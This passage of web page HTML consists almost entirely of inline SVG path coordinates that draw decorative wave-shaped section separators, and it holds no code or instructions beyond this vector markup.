d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 